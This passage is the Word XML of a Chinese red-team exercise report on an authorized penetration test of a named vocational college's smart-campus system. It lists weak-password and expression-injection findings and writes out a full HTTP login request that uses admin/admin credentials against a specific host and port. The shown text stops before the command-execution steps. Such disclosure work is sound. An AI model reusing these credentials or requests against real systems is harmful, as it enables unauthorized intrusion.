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DBC3066">
      <w:pPr>
        <w:pStyle w:val="style62"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>攻防演练安全隐患报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67999E0E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_Toc5952"/>
    <w:p w14:paraId="0B517999">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、综述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4FB29562">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>经过演习指挥部授权，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>攻击队</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>于2026年9月16日，对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>杭州</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>第一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>技师学院</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>进行了渗透评估，通过模拟真实网络攻击行为，评估系统是否存在可以被攻击者利用的漏洞以及由此因此引发的风险大小，为制定相应的安全措施与解决方案提供实际的依据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1119B04A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透结果总结汇总如下表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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701"/>
        <w:gridCol w:w="2833"/>
        <w:gridCol w:w="672"/>
      </w:tblGrid>
      <w:tr w14:paraId="24401E53">
        <w:trPr>
          <w:trHeight w:val="521" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:val="clear" w:color="auto" w:fill="d9d9d9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="218CB8A3">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160"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渗透系统对象</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:val="clear" w:color="auto" w:fill="d9d9d9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E941012">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160"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漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2833" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:val="clear" w:color="auto" w:fill="d9d9d9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="013947A1">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160"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URL（可罗列）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:val="clear" w:color="auto" w:fill="d9d9d9"/>
          </w:tcPr>
          <w:p w14:paraId="0D7D8ABD">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="40EF0578">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="359" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AD814D4">
            <w:pPr>
              <w:pStyle w:val="style94"/>
              <w:widowControl/>
              <w:spacing w:beforeAutospacing="false" w:afterAutospacing="false"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>杭州第一技师学院智慧校园</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EA3F3D3">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52CDCFE6">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160"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弱口令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2833" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p w14:paraId="3CAD9A20">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>http://web.hzdyjsxy.cn/snail-job/auth/login</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "https://dam.ygwjg.com/" \t "_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AFE82DB">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkStart w:id="1" w:name="_Toc1611"/>
      <w:tr w14:paraId="4DE9EFC2">
        <w:tblPrEx/>
        <w:trPr>
          <w:trHeight w:val="90" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3539" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CB19474">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3398E109">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>表达式注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2833" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p w14:paraId="0AFDE745">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="499E031B">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="229FD439">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、渗透分析过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:bookmarkStart w:id="2" w:name="_Toc129940287"/>
    <w:p w14:paraId="689D5403">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:cs="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:cs="楷体" w:eastAsia="楷体" w:hAnsi="楷体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>（一）渗透路径说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="76ACF7F7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:widowControl/>
        <w:kinsoku w:val="false"/>
        <w:autoSpaceDE w:val="false"/>
        <w:autoSpaceDN w:val="false"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:lineRule="auto" w:line="360"/>
        <w:ind w:firstLine="960" w:firstLineChars="300"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1.路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:cs="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://web.hzdyjsxy.cn/snail-job/auth/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1A8C1">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、渗透成果说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3CEDB">
      <w:pPr>
        <w:pStyle w:val="style2"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（一）风险状况概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4359C3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统域名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://web.hzdyjsxy.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD75C23">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:ind w:firstLine="640"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统所属单位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杭州第一技师学院</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杭州市高级技工学校、杭州医药职工中等专业学校</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6A3CC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F6B754">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE3F2DA">
      <w:pPr>
        <w:pStyle w:val="style4097"/>
        <w:spacing w:before="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5457190" cy="2997835"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12065"/>
            <wp:docPr id="1026" name="图片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4"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId2" cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5457190" cy="2997835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E846CC">
      <w:pPr>
        <w:pStyle w:val="style2"/>
        <w:ind w:firstLine="640"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（二）系统漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0E364">
      <w:pPr>
        <w:pStyle w:val="style1"/>
        <w:widowControl/>
        <w:ind w:firstLine="640"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>杭州第一技师学院智慧校园系统命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265040A8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>首先admin/admin弱口令登陆后台</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="style154"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w14:paraId="3FC3C80E">
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FCD31E3">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>POST /snail-job/auth/login HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DFFCEE5">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Host: web.hzdyjsxy.cn:18080</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B103BA">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Content-Type: application/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E8DCED">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="640"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E702838">
            <w:pPr>
              <w:pStyle w:val="style0"/>
              <w:spacing w:lineRule="auto" w:line="240"/>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>{"username":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54DEA783">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:cs="Times New Roman" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5276850" cy="2425700"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1027"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 cstate="print"/>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276850" cy="2425700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD320A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:after="160" w:lineRule="auto" w:line="276"/>
        <w:ind w:firstLine="440"/>
        <w:jc w:val="left"/>
